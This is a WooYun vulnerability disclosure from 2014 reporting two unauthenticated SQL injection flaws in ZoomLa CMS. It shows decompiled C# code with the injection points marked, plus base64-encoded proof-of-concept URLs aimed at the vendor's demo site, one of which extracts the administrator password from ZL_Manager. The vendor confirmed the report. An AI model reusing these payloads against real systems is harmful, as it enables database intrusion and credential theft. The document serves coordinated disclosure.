当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071205

漏洞标题:逐浪CMS注入漏洞两处

相关厂商:逐浪CMS

漏洞作者: Vigoss_Z

提交时间:2014-08-09 19:44

修复时间:2014-11-07 19:46

公开时间:2014-11-07 19:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-09: 细节已通知厂商并且等待厂商处理中
2014-08-10: 厂商已经确认,细节仅向厂商公开
2014-08-13: 细节向第三方安全合作伙伴开放
2014-10-04: 细节向核心白帽子及相关领域专家公开
2014-10-14: 细节向普通白帽子公开
2014-10-24: 细节向实习白帽子公开
2014-11-07: 细节向公众公开

简要描述:

无需登录,完美的注射点!

详细说明:

0x1
App_Web_rckpp0om.dll
User_file  类,Page_Load()事件就有问题  
if ((base.Request["state"] != null) && (base.Request["state"] == "tr"))
        {
            string str4 = base.Request.QueryString["FD"];
            this.FileUrl = this.FileJiema(str4);
            this.hid.Value = str4;
            this.file = this.bfile.SelectFile(string.Concat(new object[] { " FileName='", this.FileUrl, "' and userid=", this.ull.GetLogin().UserID }));//注入点
            if (this.file.DownUrl == null)
            {
                base.Response.Write("0");
                base.Response.End();
            }
看一下bfile.SelectFile(string)函数,拼接SQL语句
public M_File SelectFile(string where)
{
    if (where == "")
    {
        this.sql = "select * from ZL_File";
    }
    else
    {
        this.sql = "select * from ZL_File where " + where;
    }
    M_File file = new M_File();
    SqlDataReader reader = SqlHelper.ExecuteReader(CommandType.Text, this.sql);
    if (reader.Read())
    {
        file.UserID = Convert.ToInt32(reader["UserID"]);
        file.State = Convert.ToInt32(reader["State"]);
        file.ExtractionCode = reader["ExtractionCode"].ToString();
        file.DownUrl = reader["DownUrl"].ToString();
        file.FileName = reader["FileName"].ToString();
        file.FileMD5 = reader["FileMD5"].ToString();
    }
    return file;
}
base.Request.QueryString["FD"]可控,最喜欢的注入点,base64的注入语句!


搜索一下调用user_file类的文件:url为http://demo.zoomla.cn/common/file.aspx?FD=xxx&state=tr

FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr
FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr


理论上这个点还可以任意文件读取。
0x2

App_Web_acbkzcqn.dll  中的Edit_Statistics类
protected void Page_Load(object sender, EventArgs e)
{
    this.GroupID = this.buser.GetLogin().GroupID;
    string groupName = this.bGll.GetByID(this.GroupID).GroupName;
    if (base.Request.QueryString["GID"] != null)
    {
        base.Request.QueryString["GID"].ToString();
        M_Node nodeXML = this.bll.GetNodeXML(DataConverter.CLng(DataConverter.CLng(base.Request.QueryString["NodeID"])));
        XmlDocument document = new XmlDocument();
        try
        {
            document.Load(base.Server.MapPath("/Config/Payment.xml"));
        }
        catch (Exception)
        {
            function.WriteErrMsg("出现错误");
        }
        XmlNode node2 = document.SelectSingleNode("UserGroups/" + function.GetChineseFirstChar(groupName) + "/Manner");
        this.Articles = DataConverter.CLng(node2.Attributes["Articles"].Value);
        M_Bnum bnum = this.b_EditWord.SelectBnum(string.Concat(new object[] { " datediff(week,browsertime,getdate())=0  and uid=", this.buser.GetLogin().UserID, " and GID=", base.Request.QueryString["GID"], " order by acid desc" }));//注入点
        this.BEcount = this.b_EditWord.BnumCount("");
        this.NodeBecount = this.b_EditWord.BnumCount("count(distinct(gid))| and nodeid=" + base.Request.QueryString["NodeID"]);


GID注入,前面的NODEID带入正常访问的值即可。
Edit/Statistics.aspx
不测试了,官方修一下吧。

漏洞证明:

http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgKHNlbGVjdCB0b3AgMSBBZG1pblBhc3N3b3JkIGZyb20gWkxfTWFuYWdlcik%2bMCBhbmQgJzEnPScx&state=tr
http://demo.zoomla.cn/common/file.aspx?FD=JyBhbmQgQEB2ZXJzaW9uPjAgYW5kICcxJz0nMQ%3d%3d&state=tr

修复方案:

版权声明:转载请注明来源 Vigoss_Z@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-08-10 13:41

厂商回复:

感谢

最新状态:

暂无